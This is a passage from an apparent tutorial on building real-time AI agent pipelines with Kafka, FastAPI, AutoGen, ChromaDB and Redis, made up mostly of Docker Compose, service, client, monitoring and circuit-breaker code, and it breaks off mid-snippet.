1# agent-storage.yaml
2apiVersion: v1
3kind: PersistentVolumeClaim
4metadata:
5 name: agent-data-pvc
6 namespace: ai-agents
7spec:
8 accessModes:
9 - ReadWriteOnce
10 resources:
11 requests:
12 storage: 10Gi
13 storageClassName: standard

This stack is particularly well-suited for organizations that need to:

  • Process large volumes of data with AI agents
  • Run complex simulations or forecasting models
  • Support high-throughput API services backed by AI agents
  • Dynamically allocate computing resources based on demand

Apache Kafka + FastAPI + AutoGen + ChromaDB (Real-Time AI Pipelines)

This stack is optimized for event-driven, real-time AI agent systems that need to process streaming data and respond to events as they occur. It's ideal for applications like fraud detection, real-time monitoring, and event-based workflow automation.

Architecture Overview:

Kafka + FastAPI + AutoGen Architecture

The architecture consists of:

  1. Apache Kafka: Event streaming platform for high-throughput message processing
  2. FastAPI: High-performance API framework for agent endpoints and services
  3. AutoGen: Multi-agent orchestration framework
  4. ChromaDB: Vector database for efficient knowledge retrieval
  5. Redis: Cache for agent state and session management

Implementation Example:

First, let's set up our environment with Docker Compose:

yaml
1# docker-compose.yml
2version: '3'
3
4services:
5 zookeeper:
6 image: confluentinc/cp-zookeeper:7.3.0
7 environment:
8 ZOOKEEPER_CLIENT_PORT: 2181
9 healthcheck:
10 test: ["CMD", "nc", "-z", "localhost", "2181"]
11 interval: 10s
12 timeout: 5s
13 retries: 5
14
15 kafka:
16 image: confluentinc/cp-kafka:7.3.0
17 depends_on:
18 zookeeper:
19 condition: service_healthy
20 ports:
21 - "9092:9092"
22 environment:
23 KAFKA_BROKER_ID: 1
24 KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
25 KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:29092,PLAINTEXT_HOST://localhost:9092
26 KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
27 KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
28 KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
29 KAFKA_TRANSACTION_STATE_LOG_REPLICATION_FACTOR: 1
30 healthcheck:
31 test: ["CMD", "kafka-topics", "--bootstrap-server", "localhost:9092", "--list"]
32 interval: 10s
33 timeout: 5s
34 retries: 5
35
36 redis:
37 image: redis:7.0-alpine
38 ports:
39 - "6379:6379"
40 healthcheck:
41 test: ["CMD", "redis-cli", "ping"]
42 interval: 5s
43 timeout: 3s
44 retries: 5
45
46 chromadb:
47 image: ghcr.io/chroma-core/chroma:0.4.15
48 ports:
49 - "8000:8000"
50 volumes:
51 - chroma-data:/chroma/chroma
52 environment:
53 - CHROMA_DB_IMPL=duckdb+parquet
54 - CHROMA_PERSIST_DIRECTORY=/chroma/chroma
55
56 agent-service:
57 build:
58 context: .
59 dockerfile: Dockerfile.agent
60 depends_on:
61 kafka:
62 condition: service_healthy
63 redis:
64 condition: service_healthy
65 chromadb:
66 condition: service_started
67 ports:
68 - "8080:8080"
69 volumes:
70 - ./app:/app
71 - ./data:/data
72 environment:
73 - KAFKA_BOOTSTRAP_SERVERS=kafka:29092
74 - REDIS_HOST=redis
75 - REDIS_PORT=6379
76 - CHROMA_HOST=chromadb
77 - CHROMA_PORT=8000
78 - OPENAI_API_KEY=${OPENAI_API_KEY}
79 command: uvicorn app.main:app --host 0.0.0.0 --port 8080 --reload
80
81volumes:
82 chroma-data:

Next, let's build our FastAPI application:

python
1# app/main.py
2import os
3import json
4import asyncio
5import uuid
6from datetime import datetime
7from typing import Dict, List, Optional, Any
8
9import redis
10import autogen
11import chromadb
12from chromadb.utils import embedding_functions
13from fastapi import FastAPI, BackgroundTasks, HTTPException, Depends
14from fastapi.middleware.cors import CORSMiddleware
15from pydantic import BaseModel, Field
16from aiokafka import AIOKafkaProducer, AIOKafkaConsumer
17from contextlib import asynccontextmanager
18
19# Models for API requests and responses
20class AgentRequest(BaseModel):
21 query: str
22 user_id: str
23 context: Optional[Dict[str, Any]] = None
24 agent_type: str = "general"
25 priority: str = "normal"
26
27class AgentResponse(BaseModel):
28 request_id: str
29 status: str
30 message: str
31 data: Optional[Dict[str, Any]] = None
32 timestamp: str = Field(default_factory=lambda: datetime.now().isoformat())
33
34class EventData(BaseModel):
35 event_type: str
36 payload: Dict[str, Any]
37 timestamp: str = Field(default_factory=lambda: datetime.now().isoformat())
38
39# Configure Redis client
40redis_client = redis.Redis(
41 host=os.environ.get("REDIS_HOST", "localhost"),
42 port=int(os.environ.get("REDIS_PORT", 6379)),
43 decode_responses=True
44)
45
46# Configure ChromaDB client
47chroma_client = chromadb.HttpClient(
48 host=os.environ.get("CHROMA_HOST", "localhost"),
49 port=int(os.environ.get("CHROMA_PORT", 8000))
50)
51
52# Configure embedding function
53openai_ef = embedding_functions.OpenAIEmbeddingFunction(
54 api_key=os.environ.get("OPENAI_API_KEY"),
55 model_name="text-embedding-ada-002"
56)
57
58# Ensure collections exist
59try:
60 knowledge_collection = chroma_client.get_collection(
61 name="agent_knowledge",
62 embedding_function=openai_ef
63 )
64except:
65 knowledge_collection = chroma_client.create_collection(
66 name="agent_knowledge",
67 embedding_function=openai_ef
68 )
69
70# Kafka configuration
71KAFKA_BOOTSTRAP_SERVERS = os.environ.get("KAFKA_BOOTSTRAP_SERVERS", "localhost:9092")
72AGENT_REQUEST_TOPIC = "agent_requests"
73AGENT_RESPONSE_TOPIC = "agent_responses"
74EVENT_TOPIC = "system_events"
75
76# Initialize Kafka producer
77producer = None
78
79# Lifespan manager for FastAPI to handle async setup/teardown
80@asynccontextmanager
81async def lifespan(app: FastAPI):
82 # Setup: create global producer
83 global producer
84 producer = AIOKafkaProducer(
85 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
86 value_serializer=lambda v: json.dumps(v).encode('utf-8'),
87 acks='all',
88 enable_idempotence=True,
89 retries=3
90 )
91
92 # Start the producer
93 await producer.start()
94
95 # Start the consumer tasks
96 consumer_task = asyncio.create_task(consume_agent_responses())
97 event_consumer_task = asyncio.create_task(consume_events())
98
99 # Yield control back to FastAPI
100 yield
101
102 # Cleanup: close producer and cancel consumer tasks
103 consumer_task.cancel()
104 event_consumer_task.cancel()
105
106 try:
107 await consumer_task
108 except asyncio.CancelledError:
109 pass
110
111 try:
112 await event_consumer_task
113 except asyncio.CancelledError:
114 pass
115
116 await producer.stop()
117
118# Initialize FastAPI
119app = FastAPI(lifespan=lifespan)
120
121# Configure CORS
122app.add_middleware(
123 CORSMiddleware,
124 allow_origins=["*"],
125 allow_credentials=True,
126 allow_methods=["*"],
127 allow_headers=["*"],
128)
129
130# Agent factory for creating different agent types
131class AgentFactory:
132 @staticmethod
133 def create_agent(agent_type, context=None):
134 llm_config = {
135 "config_list": [
136 {
137 "model": "gpt-4",
138 "api_key": os.environ.get("OPENAI_API_KEY")
139 }
140 ],
141 "temperature": 0.5,
142 "timeout": 120,
143 "cache_seed": None # Disable caching for real-time applications
144 }
145
146 if agent_type == "analyst":
147 system_message = """You are a financial analyst agent specialized in market trends
148 and investment strategies. Analyze data precisely and provide actionable insights."""
149
150 # Add specific functions for analyst
151 llm_config["functions"] = [
152 {
153 "name": "analyze_market_data",
154 "description": "Analyze market data to identify trends and opportunities",
155 "parameters": {
156 "type": "object",
157 "properties": {
158 "sector": {"type": "string", "description": "Market sector to analyze"},
159 "timeframe": {"type": "string", "description": "Timeframe for analysis (e.g., '1d', '1w', '1m')"},
160 "metrics": {"type": "array", "items": {"type": "string"}, "description": "Metrics to include in analysis"}
161 },
162 "required": ["sector", "timeframe"]
163 }
164 }
165 ]
166
167 elif agent_type == "support":
168 system_message = """You are a customer support agent that helps users with
169 technical issues and product questions. Be empathetic and solution-oriented."""
170
171 else: # default general agent
172 system_message = """You are a helpful AI assistant that provides accurate and
173 concise information on a wide range of topics."""
174
175 # Create the agent
176 agent = autogen.AssistantAgent(
177 name=f"{agent_type.capitalize()}Agent",
178 system_message=system_message,
179 llm_config=llm_config
180 )
181
182 return agent
183
184# Function to retrieve relevant knowledge for agent context
185async def retrieve_knowledge(query, filters=None, limit=5):
186 try:
187 results = knowledge_collection.query(
188 query_texts=[query],
189 n_results=limit,
190 where=filters
191 )
192
193 if results and len(results['documents']) > 0:
194 documents = results['documents'][0]
195 metadatas = results['metadatas'][0] if 'metadatas' in results else [{}] * len(documents)
196 distances = results['distances'][0] if 'distances' in results else [1.0] * len(documents)
197
198 return [
199 {
200 "content": doc,
201 "metadata": meta,
202 "relevance": 1 - dist if dist <= 1 else 0
203 }
204 for doc, meta, dist in zip(documents, metadatas, distances)
205 ]
206 return []
207 except Exception as e:
208 print(f"Error retrieving knowledge: {e}")
209 return []
210
211# Background task to process agent request through Kafka
212async def process_agent_request(request_id: str, request: AgentRequest):
213 try:
214 # Publish request to Kafka
215 await producer.send_and_wait(
216 AGENT_REQUEST_TOPIC,
217 {
218 "request_id": request_id,
219 "query": request.query,
220 "user_id": request.user_id,
221 "context": request.context,
222 "agent_type": request.agent_type,
223 "priority": request.priority,
224 "timestamp": datetime.now().isoformat()
225 }
226 )
227
228 # Update request status in Redis
229 redis_client.hset(
230 f"request:{request_id}",
231 mapping={
232 "status": "processing",
233 "timestamp": datetime.now().isoformat()
234 }
235 )
236 redis_client.expire(f"request:{request_id}", 3600) # Expire after 1 hour
237
238 # Publish event
239 await producer.send_and_wait(
240 EVENT_TOPIC,
241 {
242 "event_type": "agent_request_received",
243 "payload": {
244 "request_id": request_id,
245 "user_id": request.user_id,
246 "agent_type": request.agent_type,
247 "priority": request.priority
248 },
249 "timestamp": datetime.now().isoformat()
250 }
251 )
252
253 except Exception as e:
254 # Update request status in Redis
255 redis_client.hset(
256 f"request:{request_id}",
257 mapping={
258 "status": "error",
259 "error": str(e),
260 "timestamp": datetime.now().isoformat()
261 }
262 )
263 redis_client.expire(f"request:{request_id}", 3600) # Expire after 1 hour
264
265 # Publish error event
266 await producer.send_and_wait(
267 EVENT_TOPIC,
268 {
269 "event_type": "agent_request_error",
270 "payload": {
271 "request_id": request_id,
272 "error": str(e)
273 },
274 "timestamp": datetime.now().isoformat()
275 }
276 )
277
278# Consumer for agent responses
279async def consume_agent_responses():
280 consumer = AIOKafkaConsumer(
281 AGENT_RESPONSE_TOPIC,
282 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
283 group_id="agent-service-group",
284 value_deserializer=lambda m: json.loads(m.decode('utf-8')),
285 auto_offset_reset="latest",
286 enable_auto_commit=True
287 )
288
289 await consumer.start()
290
291 try:
292 async for message in consumer:
293 response_data = message.value
294 request_id = response_data.get("request_id")
295
296 if request_id:
297 # Update response in Redis
298 redis_client.hset(
299 f"request:{request_id}",
300 mapping={
301 "status": "completed",
302 "response": json.dumps(response_data),
303 "completed_at": datetime.now().isoformat()
304 }
305 )
306
307 # Publish completion event
308 await producer.send(
309 EVENT_TOPIC,
310 {
311 "event_type": "agent_response_completed",
312 "payload": {
313 "request_id": request_id,
314 "processing_time": response_data.get("processing_time")
315 },
316 "timestamp": datetime.now().isoformat()
317 }
318 )
319 finally:
320 await consumer.stop()
321
322# Consumer for system events
323async def consume_events():
324 consumer = AIOKafkaConsumer(
325 EVENT_TOPIC,
326 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
327 group_id="event-processor-group",
328 value_deserializer=lambda m: json.loads(m.decode('utf-8')),
329 auto_offset_reset="latest",
330 enable_auto_commit=True
331 )
332
333 await consumer.start()
334
335 try:
336 async for message in consumer:
337 event_data = message.value
338 event_type = event_data.get("event_type")
339
340 # Process different event types
341 if event_type == "agent_request_received":
342 # Metrics tracking
343 pass
344 elif event_type == "agent_response_completed":
345 # Performance monitoring
346 pass
347 elif event_type == "agent_request_error":
348 # Error handling and alerting
349 pass
350 finally:
351 await consumer.stop()
352
353# Worker process that handles agent requests from Kafka
354async def agent_worker():
355 consumer = AIOKafkaConsumer(
356 AGENT_REQUEST_TOPIC,
357 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
358 group_id="agent-worker-group",
359 value_deserializer=lambda m: json.loads(m.decode('utf-8')),
360 auto_offset_reset="earliest",
361 enable_auto_commit=True
362 )
363
364 await consumer.start()
365
366 try:
367 async for message in consumer:
368 request_data = message.value
369 request_id = request_data.get("request_id")
370
371 start_time = datetime.now()
372
373 try:
374 # Create appropriate agent type
375 agent = AgentFactory.create_agent(
376 request_data.get("agent_type", "general"),
377 context=request_data.get("context")
378 )
379
380 # Retrieve relevant knowledge
381 knowledge = await retrieve_knowledge(
382 request_data.get("query"),
383 filters={"domain": request_data.get("context", {}).get("domain")} if request_data.get("context") else None
384 )
385
386 # Create user proxy agent for handling the conversation
387 user_proxy = autogen.UserProxyAgent(
388 name="User",
389 human_input_mode="NEVER",
390 max_consecutive_auto_reply=0,
391 code_execution_config={"work_dir": "workspace"}
392 )
393
394 # Build the prompt with knowledge context
395 knowledge_context = ""
396 if knowledge:
397 knowledge_context = "\n\nRelevant context:\n"
398 for i, item in enumerate(knowledge, 1):
399 knowledge_context += f"{i}. {item['content']}\n"
400
401 query = request_data.get("query")
402 message = f"{query}\n{knowledge_context}"
403
404 # Start conversation with agent
405 user_proxy.initiate_chat(agent, message=message)
406
407 # Extract agent response
408 response_content = ""
409 if user_proxy.chat_history and len(user_proxy.chat_history) > 1:
410 # Get the last message from the agent
411 for msg in reversed(user_proxy.chat_history):
412 if msg.get("role") == "assistant":
413 response_content = msg.get("content", "")
414 break
415
416 processing_time = (datetime.now() - start_time).total_seconds()
417
418 # Send response back through Kafka
419 await producer.send_and_wait(
420 AGENT_RESPONSE_TOPIC,
421 {
422 "request_id": request_id,
423 "status": "success",
424 "response": response_content,
425 "processing_time": processing_time,
426 "timestamp": datetime.now().isoformat()
427 }
428 )
429
430 except Exception as e:
431 processing_time = (datetime.now() - start_time).total_seconds()
432
433 # Send error response
434 await producer.send_and_wait(
435 AGENT_RESPONSE_TOPIC,
436 {
437 "request_id": request_id,
438 "status": "error",
439 "error": str(e),
440 "processing_time": processing_time,
441 "timestamp": datetime.now().isoformat()
442 }
443 )
444 finally:
445 await consumer.stop()
446
447# Routes
448@app.post("/api/agent/request", response_model=AgentResponse)
449async def create_agent_request(request: AgentRequest, background_tasks: BackgroundTasks):
450 request_id = str(uuid.uuid4())
451
452 # Store initial request in Redis
453 redis_client.hset(
454 f"request:{request_id}",
455 mapping={
456 "user_id": request.user_id,
457 "query": request.query,
458 "agent_type": request.agent_type,
459 "status": "pending",
460 "timestamp": datetime.now().isoformat()
461 }
462 )
463 redis_client.expire(f"request:{request_id}", 3600) # Expire after 1 hour
464
465 # Process request asynchronously
466 background_tasks.add_task(process_agent_request, request_id, request)
467
468 return AgentResponse(
469 request_id=request_id,
470 status="pending",
471 message="Request has been submitted for processing"
472 )
473
474@app.get("/api/agent/status/{request_id}", response_model=AgentResponse)
475async def get_agent_status(request_id: str):
476 # Check if request exists in Redis
477 request_data = redis_client.hgetall(f"request:{request_id}")
478
479 if not request_data:
480 raise HTTPException(status_code=404, detail="Request not found")
481
482 status = request_data.get("status", "unknown")
483
484 if status == "completed":
485 # Return the completed response
486 response_data = json.loads(request_data.get("response", "{}"))
487 return AgentResponse(
488 request_id=request_id,
489 status=status,
490 message="Request completed",
491 data=response_data
492 )
493 elif status == "error":
494 # Return error details
495 return AgentResponse(
496 request_id=request_id,
497 status=status,
498 message=f"Error processing request: {request_data.get('error', 'Unknown error')}",
499 )
500 else:
501 # Return current status
502 return AgentResponse(
503 request_id=request_id,
504 status=status,
505 message=f"Request is currently {status}"
506 )
507
508@app.post("/api/events/publish", status_code=202)
509async def publish_event(event: EventData):
510 try:
511 await producer.send_and_wait(
512 EVENT_TOPIC,
513 event.dict()
514 )
515 return {"status": "success", "message": "Event published successfully"}
516 except Exception as e:
517 raise HTTPException(status_code=500, detail=f"Failed to publish event: {str(e)}")
518
519@app.post("/api/knowledge/add")
520async def add_knowledge(items: List[Dict[str, Any]]):
521 try:
522 documents = [item["content"] for item in items]
523 metadata = [item.get("metadata", {}) for item in items]
524 ids = [f"doc_{uuid.uuid4()}" for _ in items]
525
526 knowledge_collection.add(
527 documents=documents,
528 metadatas=metadata,
529 ids=ids
530 )
531
532 return {"status": "success", "message": f"Added {len(documents)} items to knowledge base"}
533 except Exception as e:
534 raise HTTPException(status_code=500, detail=f"Failed to add knowledge: {str(e)}")
535
536@app.get("/api/knowledge/search")
537async def search_knowledge(query: str, limit: int = 5):
538 knowledge = await retrieve_knowledge(query, limit=limit)
539 return {"results": knowledge}
540
541# Start worker process when app starts
542@app.on_event("startup")
543async def startup_event():
544 asyncio.create_task(agent_worker())
545
546if __name__ == "__main__":
547 import uvicorn
548 uvicorn.run("main:app", host="0.0.0.0", port=8080, reload=True)

Client Implementation Example:

python
1# client.py
2import asyncio
3import json
4import time
5import uuid
6from typing import Dict, List, Any, Optional
7
8import aiohttp
9from pydantic import BaseModel
10
11class AgentClient:
12 def __init__(self, base_url: str = "http://localhost:8080"):
13 self.base_url = base_url
14 self.session = None
15
16 async def __aenter__(self):
17 self.session = aiohttp.ClientSession()
18 return self
19
20 async def __aexit__(self, exc_type, exc_val, exc_tb):
21 if self.session:
22 await self.session.close()
23
24 async def submit_request(self, query: str, user_id: str,
25 agent_type: str = "general",
26 context: Optional[Dict[str, Any]] = None,
27 priority: str = "normal") -> Dict[str, Any]:
28 """Submit a request to the agent service."""
29 if self.session is None:
30 self.session = aiohttp.ClientSession()
31
32 payload = {
33 "query": query,
34 "user_id": user_id,
35 "agent_type": agent_type,
36 "priority": priority
37 }
38
39 if context:
40 payload["context"] = context
41
42 async with self.session.post(
43 f"{self.base_url}/api/agent/request",
44 json=payload
45 ) as response:
46 if response.status == 200:
47 return await response.json()
48 else:
49 error_text = await response.text()
50 raise Exception(f"Error submitting request: {error_text}")
51
52 async def get_request_status(self, request_id: str) -> Dict[str, Any]:
53 """Get the status of a request."""
54 if self.session is None:
55 self.session = aiohttp.ClientSession()
56
57 async with self.session.get(
58 f"{self.base_url}/api/agent/status/{request_id}"
59 ) as response:
60 if response.status == 200:
61 return await response.json()
62 else:
63 error_text = await response.text()
64 raise Exception(f"Error getting status: {error_text}")
65
66 async def wait_for_completion(self, request_id: str,
67 polling_interval: float = 1.0,
68 timeout: float = 120.0) -> Dict[str, Any]:
69 """Wait for a request to complete, with timeout."""
70 start_time = time.time()
71
72 while (time.time() - start_time) < timeout:
73 status_response = await self.get_request_status(request_id)
74
75 if status_response["status"] in ["completed", "error"]:
76 return status_response
77
78 await asyncio.sleep(polling_interval)
79
80 raise TimeoutError(f"Request {request_id} did not complete within {timeout} seconds")
81
82 async def add_knowledge(self, items: List[Dict[str, Any]]) -> Dict[str, Any]:
83 """Add knowledge items to the agent knowledge base."""
84 if self.session is None:
85 self.session = aiohttp.ClientSession()
86
87 async with self.session.post(
88 f"{self.base_url}/api/knowledge/add",
89 json=items
90 ) as response:
91 if response.status == 200:
92 return await response.json()
93 else:
94 error_text = await response.text()
95 raise Exception(f"Error adding knowledge: {error_text}")
96
97 async def search_knowledge(self, query: str, limit: int = 5) -> Dict[str, Any]:
98 """Search the knowledge base."""
99 if self.session is None:
100 self.session = aiohttp.ClientSession()
101
102 async with self.session.get(
103 f"{self.base_url}/api/knowledge/search",
104 params={"query": query, "limit": limit}
105 ) as response:
106 if response.status == 200:
107 return await response.json()
108 else:
109 error_text = await response.text()
110 raise Exception(f"Error searching knowledge: {error_text}")
111
112async def main():
113 # Example client usage
114 async with AgentClient() as client:
115 # Add knowledge first
116 knowledge_items = [
117 {
118 "content": "Apple Inc. reported Q4 2023 earnings of $1.46 per share, exceeding analyst expectations of $1.39 per share.",
119 "metadata": {
120 "domain": "finance",
121 "category": "earnings",
122 "company": "Apple",
123 "date": "2023-10-27"
124 }
125 },
126 {
127 "content": "The S&P 500 closed at 4,738.15 on January 12, 2024, up 1.2% for the day.",
128 "metadata": {
129 "domain": "finance",
130 "category": "market_data",
131 "index": "S&P 500",
132 "date": "2024-01-12"
133 }
134 }
135 ]
136
137 knowledge_result = await client.add_knowledge(knowledge_items)
138 print(f"Knowledge add result: {json.dumps(knowledge_result, indent=2)}")
139
140 # Submit a request to the analyst agent
141 request_result = await client.submit_request(
142 query="What was Apple's performance in their most recent earnings report?",
143 user_id="test-user-123",
144 agent_type="analyst",
145 context={
146 "domain": "finance",
147 "analysis_type": "earnings"
148 }
149 )
150
151 print(f"Request submitted: {json.dumps(request_result, indent=2)}")
152 request_id = request_result["request_id"]
153
154 # Wait for completion
155 try:
156 completion_result = await client.wait_for_completion(
157 request_id,
158 polling_interval=2.0,
159 timeout=60.0
160 )
161
162 print(f"Request completed: {json.dumps(completion_result, indent=2)}")
163
164 except TimeoutError as e:
165 print(f"Request timed out: {e}")
166
167if __name__ == "__main__":
168 asyncio.run(main())

Key Advantages:

  1. Real-Time Processing: Stream processing via Kafka enables immediate response to events
  2. Decoupling: Producers and consumers are decoupled, enabling system resilience
  3. Scalability: Each component can scale independently based on demand
  4. Event Sourcing: All interactions are event-based, enabling replay and audit capabilities
  5. Statelessness: API services remain stateless for easier scaling and deployment

Production Considerations:

  1. Kafka Topic Configuration:
python
1# kafka_setup.py
2from kafka.admin import KafkaAdminClient, NewTopic
3import kafka.errors as errors
4
5def setup_kafka_topics():
6 admin_client = KafkaAdminClient(
7 bootstrap_servers="localhost:9092",
8 client_id="admin-client"
9 )
10
11 # Define topics with optimal configurations
12 topic_configs = [
13 # Agent request topic - moderate throughput with ordered processing
14 NewTopic(
15 name="agent_requests",
16 num_partitions=4, # Balance parallelism and ordering
17 replication_factor=3, # High reliability for requests
18 topic_configs={
19 "retention.ms": str(7 * 24 * 60 * 60 * 1000), # 7 days retention
20 "cleanup.policy": "delete",
21 "min.insync.replicas": "2", # Ensure at least 2 replicas are in sync
22 "unclean.leader.election.enable": "false", # Prevent data loss
23 "compression.type": "lz4" # Efficient compression
24 }
25 ),
26
27 # Agent response topic - higher throughput, less ordering dependency
28 NewTopic(
29 name="agent_responses",
30 num_partitions=8, # Higher parallelism for responses
31 replication_factor=3,
32 topic_configs={
33 "retention.ms": str(7 * 24 * 60 * 60 * 1000), # 7 days retention
34 "cleanup.policy": "delete",
35 "min.insync.replicas": "2",
36 "compression.type": "lz4"
37 }
38 ),
39
40 # System events topic - high volume, compacted for latest state
41 NewTopic(
42 name="system_events",
43 num_partitions=16, # High parallelism for metrics and events
44 replication_factor=3,
45 topic_configs={
46 "cleanup.policy": "compact,delete", # Compact for state, delete for retention
47 "delete.retention.ms": str(24 * 60 * 60 * 1000), # 1 day retention after compaction
48 "min.compaction.lag.ms": str(60 * 1000), # 1 minute minimum time before compaction
49 "segment.ms": str(6 * 60 * 60 * 1000), # 6 hour segments
50 "min.insync.replicas": "2",
51 "compression.type": "lz4"
52 }
53 )
54 ]
55
56 # Create topics
57 for topic in topic_configs:
58 try:
59 admin_client.create_topics([topic])
60 print(f"Created topic: {topic.name}")
61 except errors.TopicAlreadyExistsError:
62 print(f"Topic already exists: {topic.name}")
63
64 admin_client.close()
65
66if __name__ == "__main__":
67 setup_kafka_topics()
  1. Monitoring and Metrics:
python
1# monitoring.py
2import time
3import json
4from datadog import initialize, statsd
5from functools import wraps
6from contextlib import ContextDecorator
7
8# Initialize Datadog client
9initialize(statsd_host="localhost", statsd_port=8125)
10
11class TimingMetric(ContextDecorator):
12 """Context manager/decorator for timing operations and reporting to Datadog."""
13
14 def __init__(self, metric_name, tags=None):
15 self.metric_name = metric_name
16 self.tags = tags or []
17 self.start_time = None
18
19 def __enter__(self):
20 self.start_time = time.monotonic()
21 return self
22
23 def __exit__(self, exc_type, exc_val, exc_tb):
24 duration = time.monotonic() - self.start_time
25 # Convert to milliseconds
26 duration_ms = duration * 1000
27
28 # Send timing metric
29 statsd.timing(self.metric_name, duration_ms, tags=self.tags)
30
31 # Also send as gauge for easier aggregation
32 statsd.gauge(f"{self.metric_name}.gauge", duration_ms, tags=self.tags)
33
34 # If there was an exception, count it
35 if exc_type is not None:
36 statsd.increment(
37 f"{self.metric_name}.error",
38 tags=self.tags + [f"error_type:{exc_type.__name__}"]
39 )
40
41 # Don't suppress exceptions
42 return False
43
44def timing_decorator(metric_name, tags=None):
45 """Function decorator for timing."""
46 def decorator(func):
47 @wraps(func)
48 async def async_wrapper(*args, **kwargs):
49 with TimingMetric(metric_name, tags):
50 return await func(*args, **kwargs)
51
52 @wraps(func)
53 def sync_wrapper(*args, **kwargs):
54 with TimingMetric(metric_name, tags):
55 return func(*args, **kwargs)
56
57 # Choose the appropriate wrapper based on whether the function is async
58 return async_wrapper if asyncio.iscoroutinefunction(func) else sync_wrapper
59
60 return decorator
61
62# Usage example with modified agent_worker function
63@timing_decorator("agent.request.processing", tags=["service:agent_worker"])
64async def process_agent_request(request_data):
65 # Implementation as before
66 request_id = request_data.get("request_id")
67 agent_type = request_data.get("agent_type", "general")
68
69 # Increment counter for request by agent type
70 statsd.increment("agent.request.count", tags=[
71 f"agent_type:{agent_type}",
72 f"priority:{request_data.get('priority', 'normal')}"
73 ])
74
75 # Original implementation continues...
76 # ...
77
78 # At the end, count completion
79 statsd.increment("agent.request.completed", tags=[
80 f"agent_type:{agent_type}",
81 f"status:success"
82 ])
83
84 return result
85
86# Kafka consumer with metrics
87async def consume_agent_responses():
88 consumer = AIOKafkaConsumer(
89 AGENT_RESPONSE_TOPIC,
90 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
91 group_id="agent-service-group",
92 value_deserializer=lambda m: json.loads(m.decode('utf-8')),
93 auto_offset_reset="latest",
94 enable_auto_commit=True
95 )
96
97 await consumer.start()
98
99 try:
100 async for message in consumer:
101 # Track consumer lag
102 lag = time.time() - message.timestamp/1000
103 statsd.gauge("kafka.consumer.lag_seconds", lag, tags=[
104 "topic:agent_responses",
105 "consumer_group:agent-service-group"
106 ])
107
108 # Process message with timing
109 with TimingMetric("kafka.message.processing", tags=["topic:agent_responses"]):
110 response_data = message.value
111 # Process as before...
112 # ...
113 finally:
114 await consumer.stop()
  1. Resilience and Circuit Breaking:
python
1# resilience.py
2import time
3import asyncio
4import functools
5from typing import Callable, Any, Dict, Optional
6import backoff
7from fastapi import HTTPException
8
9# Circuit breaker implementation
10class CircuitBreaker:
11 def __init__(self, failure_threshold: int = 5, recovery_timeout: float = 30.0,
12 timeout: float = 10.0, fallback: Optional[Callable] = None):
13 self.failure_threshold = failure_threshold
14 self.recovery_timeout = recovery_timeout
15 self.timeout = timeout
16 self.fallback = fallback
17 self.failure_count = 0
18 self.last_failure_time = 0
19 self.state = "CLOSED" # CLOSED, OPEN, HALF-OPEN
20
21 def __call__(self, func):
22 @functools.wraps(func)
23 async def async_wrapper(*args, **kwargs):
24 if asyncio.iscoroutinefunction(func):
25 return await self._handle_call(func, *args, **kwargs)
26 else:
27 return self._handle_sync_call(func, *args, **kwargs)
28
29 @functools.wraps(func)
30 def sync_wrapper(*args, **kwargs):
31 return self._handle_sync_call(func, *args, **kwargs)
32
33 return async_wrapper if asyncio.iscoroutinefunction(func) else sync_wrapper
34
35 async def _handle_call(self, func, *args, **kwargs):
36 if self.state == "OPEN":
37 if time.time() - self.last_failure_time > self.recovery_timeout:
38 # Move to half-open state and try the call
39 self.state = "HALF-OPEN"
40 else:
41 # Circuit is open, use fallback or raise exception
42 if self.fallback:
43 return await self.fallback(*args, **kwargs) if asyncio.iscoroutinefunction(self.fallback) else self.fallback(*args, **kwargs)
44 else:
45 raise HTTPException(status_code=503, detail="Service temporarily unavailable")
46
47 try:
48 # Set timeout for the function call
49 result = await asyncio.wait_for(func(*args, **kwargs), timeout=self.timeout)
50
51 # On success in half-open state, reset the circuit
52 if self.state == "HALF-OPEN":
53 self.failure_count = 0
54 self.state = "CLOSED"
55
56 return result
57
58 except Exception as e:
59 # On failure, increment failure count
60 self.failure_count += 1
61 self.last_failure_time = time.time()
62
63 # If failure threshold reached, open the circuit
64 if self.failure_count >= self.failure_threshold:
65 self.state = "OPEN"
66
67 # If in half-open state, go back to open state
68 if self.state == "HALF-OPEN":
69 self.state = "OPEN"
70
71 # Use fallback or re-raise the exception
72 if self.fallback:
73 return await self.fallback(*args, **kwargs) if asyncio.iscoroutinefunction(self.fallback) else self.fallback(*args, **kwargs)
74 raise e
75
76 def _handle_sync_call(self, func, *args, **kwargs):
77 if self.state == "OPEN":
78 if time.time() - self.last_failure_time > self.recovery_timeout:
79 self.state = "HALF-OPEN"
80 else:
81 if self.fallback:
82 return self.fallback(*args, **kwargs)
83 else:
84 raise HTTPException(status_code=503, detail="Service temporarily unavailable")
85
86 try:
87 # For sync functions, we can't easily apply a timeout
88 # Consider using concurrent.futures.ThreadPoolExecutor with timeout for sync functions
89 result = func(*args, **kwargs)
90
91 if self.state == "HALF-OPEN":
92 self.failure_count = 0
93 self.state = "CLOSED"
94
95 return result
96
97 except Exception as e:
98 self.failure_count += 1
99 self.last_failure_time = time.time()
100
101 if self.failure_count >= self.failure_threshold:
102 self.state = "OPEN"
103
104 if self.state == "HALF-OPEN":
105 self.state = "OPEN"
106
107 if self.fallback:
108 return self.fallback(*args, **kwargs)
109 raise e
110
111# Exponential backoff with jitter for retries
112def backoff_llm_call(max_tries=5, max_time=30):
113 def fallback_response(*args, **kwargs):
114 return {
115 "status": "degraded",
116 "message": "Service temporarily in degraded mode. Please try again later."
117 }
118
119 # Define backoff handler with jitter
120 @backoff.on_exception(
121 backoff.expo,
122 (Exception), # Retry on any exception
123 max_tries=max_tries,
124 max_time=max_time,
125 jitter=backoff.full_jitter,
126 on_backoff=lambda details: print(f"Backing off {details['wait']:0.1f} seconds after {details['tries']} tries")
127 )
128 @CircuitBreaker(
129 failure_threshold=3,
130 recovery_timeout=60.0,
131 timeout=10.0,
132 fallback=fallback_response
133 )
